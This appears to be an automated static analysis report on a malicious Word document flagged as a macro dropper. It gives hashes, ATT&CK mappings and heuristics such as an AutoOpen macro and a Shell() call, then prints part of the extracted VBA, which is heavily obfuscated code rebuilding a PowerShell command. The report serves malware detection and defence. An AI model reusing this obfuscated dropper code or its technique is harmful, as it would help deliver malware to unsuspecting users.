Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7697473c61ff3b8c…

MALICIOUS

Office (OLE)

284.0 KB Created: 2018-02-16 19:57:00 Authoring application: Microsoft Office Word First seen: 2018-11-13
MD5: e621f2506035485805585fec997a85b7 SHA-1: 40f4bf2d1bc5b3d9b1d4d9af16a2f842411544f9 SHA-256: 7697473c61ff3b8c4a22581e49372f41b2b4a38ed9a84a0a2710a4c53596b699
202 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The file contains VBA macros, including an AutoOpen macro, and a critical 'Shell()' call, indicating it is designed to execute arbitrary code. The ClamAV detection 'Doc.Dropper.Agent-6463579-0' further confirms its malicious nature as a dropper. The VBA script attempts to reconstruct a URL using string concatenation, likely for downloading a secondary payload.

Heuristics 6

  • ClamAV: Doc.Dropper.Agent-6463579-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6463579-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 32319 bytes
SHA-256: cf783b9ca66891fb3af68dacf98d189d66487bc481f1a17bdf691faab706d886
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "isFzISQXcUi"
Function tmHilSGO()
On Error Resume Next
RLodUBSqC = 7249662 + Atn(cRGVUQbhwGVLO) / mzbFz - Sgn(KasMlwVjTuKAXM * Log(jsWzlTzYEY)) / (4518283 - GEdpIImj * YujWv - NDwUnBXGEFHNf)
'qXimaJG = 2138475 + Atn(nnOjP) / qFBrljZHwm - Sgn(qblUIEkPiw * Log(kAvGVAlHV)) / (7990380 - NXwvdBVwwGS * WEZhfjdRjjS - AwfLZWqQl)
'FifoVSN = 2023780 + Atn(NVMbiuk) / RRTYBvSFYrYzjF - Sgn(ujWKYcQBvM * Log(MLSIvXvhADjXd)) / (3048029 - RSYNKj * sSuMjL - BPYLKjHmQ)
pmrNifqRu = (WLuijHraROH) + yHBjksbJKSUgsssd("VpFcouPJvq+'+'JvqREpLACE'+'(eQLCRFeQL,[STrIng][chZOP+ZOPAr]96).REpLACE(eQLZOP+ZOPoVOeQL,[STrIng][cJvZOP+ZOPq+J'+'vqhAr]36).REpLACEZOP+ZOP(eQ'+'L9uKeQJv'+'q+JvqLJvq+Jvq,[STwiwrviwRfRziNiTjHzqmBF", 8, 164)
WTrjarKG = 6963493 + Atn(znILSjz) / BbLGhCSDlS - Sgn(tLCmpKAinlCO * Log(TpFmGwb)) / (2614038 - jwBWudBA * bPzrzwASBRCLsz - zmrzjzp)
cvziCnYiGC = 8360683 + Atn(aiGlSPXcno) / wQcqImovKL - Sgn(nwnZHl * Log(UzmYV)) / (3278146 - pOzmtZXE * PhKBpuJuh - SqKztHmY)
lNTzZL = 3762101 + Atn(oZuLVSXoIQlj) / YYszjOapsqF - Sgn(ifQFiHAEOkpmwj * Log(WUlRiiGlZ)) / (232698 - DKtzvi * NrmGjdIlfVnj - wDsDVH)
cdFUXFT = (KETANin) + yHBjksbJKSUgsssd("irKuYjU]36)) ZOP).REpLACe(([ChAr]7'+'4+[ChAr]118+[ChAr]113),[S'+'TrING][ChAr]39).REpLACe(([ChAr]107+[ChAr]98+[ChAr]102),[STrING][ChAr]3'+'6) q49 .((gv ZO'+'P*MDr*ZOP).nAmE[3,11,2]-JOInZOPZOP)')  -REplAce ([rlkswIrZIOCFKq", 8, 199)
SCKbuJFoiYr = 7166506 + Atn(ItDlwq) / KARqdoJOzUtPiI - Sgn(uUFwc * Log(NOInkA)) / (3390213 - MlvBIKEYUlB * jnUqBGwDwifzNn - lJDtorhlizNVwA)
rPjmJrnJ = 4304498 + Atn(UzfYZ) / RldBOidFwnVMS - Sgn(RrNFBCm * Log(nkzCciLBiOXsr)) / (3301286 - mdzIcAaA * iHidkZXXHYws - LFuuu)
AvYwWtYNAr = 1044254 + Atn(oaXAba) / CuJsMkNUVA - Sgn(RIrAkSSXkRt * Log(iGVtzIj)) / (6542601 - KzUdw * lIoqkuMdzPo - EhEqKIjamrqQ)
OPPbiGXlA = (PpGzlojQ) + yHBjksbJKSUgsssd("whaGOZiQzt;oeQL+eQLVONSBeQL+eQL eJJKEPHDrKEMqEzjuYOKl", 10, 25)
riPzPbU = 3637904 + Atn(AzTmMwXtuR) / dzcfWltQC - Sgn(BptjzNFJ * Log(MHtHSjnY)) / (1978341 - PsmwYzJrqG * lsQMwHaDMjSk - EQksKwjNip)
mKQYHCTYWA = 7606981 + Atn(OtVlqWPCh) / OduTcMUwrw - Sgn(LrINRj * Log(XYCCcmjNFSWND)) / (6602482 - dBGzqTWskwqRC * NYYpV - IZLAHjOHCb)
iWwjc = 5699292 + Atn(ZSOGGUqaBjREl) / hMstzYiDk - Sgn(qFpHE * Log(pIUzsjn)) / (1337152 - EwvdbHHO * CCPJiFLWiKQA - iVnrJjodzZ)
iMuaZ = (mjOwbITVcYiJ) + yHBjksbJKSUgsssd("AviRktmEiwdCvIQLMmcQPUVGzvpr]82+[chAr]70'+')Jvq+Jvq,[STrIng][ZOP+ZOPchAr]39).BXjTFLCFAD", 28, 50)
wpCJtsYrw = 9703112 + Atn(aJFdijkfY) / aNhJcdSoLiTBHv - Sgn(uLUJMkXwKQszZU * Log(tkOabOJHwmHBZT)) / (953668 - CJjkVPWLL * PXtjd - ULljnjUhkEYXF)
zvdwokYrM = 6562204 + Atn(iFrpqtjddNDOZz) / NMIOhNiVlVpw - Sgn(RrzFdDlSBtnzki * Log(VjSviz)) / (8106217 - OqAkvjF * BukMlOzk - OTLSVOzfb)
UXzSMKI = 9995613 + Atn(DuQAb) / kPdTpiwamFz - Sgn(VHmhZUfit * Log(cCFUjDQHdkkGd)) / (6639288 - CYkPsi * zJFsPV - wUzmrmaN)
vDmTMb = (jiPmWBcqQYQaqk) + yHBjksbJKSUgsssd("wKfAVNuq((' (ZOP.( kbf'+'pShomE[ZOP+ZOP21]+kbfPsHoMe[30ZOP+ZOP]+JvqxJvq)( ((Jvq& ( 0r2v'+'eRBosEpREfEJvq+JvqRE'+'NCE.tOs'+'TRiNGcJYwnvrjwzLuvmzIrzNzpwKC", 9, 120)
oNvcfDusWt = 2921865 + Atn(oumjPnTmvhoEl) / iDjhYqPLv - Sgn(BYiljTURFIDPsv * Log(zwqIsirKrRGmXX)) / (4833254 - dwpfrEhFbM * wcTTLkhat - CCOKOrTZh)
aPoWLvfvZHd = 9461566 + Atn(jhaQCQItOkjjM) / hXwvBpzfBavbV - Sgn(NNfuPcSutD * Log(UZhfoW)) / (4257431 - RjUVi * HwBjzUbvjfA - lRjZn)
rSJjMWN = 5672445 + Atn(mjQQzNEZZDwsrB) / HjROuih - Sgn(tBijkESss * Log(arwrfBTvuCrkn)) / (1768093 - WKDIZ * MFHXPVdTVGL - BQJQQ)
kFwNC = (DaXvvOAKTFv) + yHBjksbJKSUgsssd("TjIQMXPiRqeQLoVOSDC);Jvq+Jvq&(teQL+eQLRFeQL+ZOP+ZOPeQLIeQLZOP'+'+ZOP+eQLnveQL+eQL'+'oeQL+eQLtRFeQJvq+JvqL+eQL+teQL+eQLRFkeQL+eQLtReQL+eJvq+JvqQLF+teJvqZOP+ZOP+JvqQL+eQLRFZOP+ZOPe-IteeQZKjGkl", 10, 175)
ThWAvhwEBwT = 8294974 + Atn(QjpcZwjh) / suFtCsikYbZO - Sgn(zzFar * Log(juCXZwkjEW
... (truncated)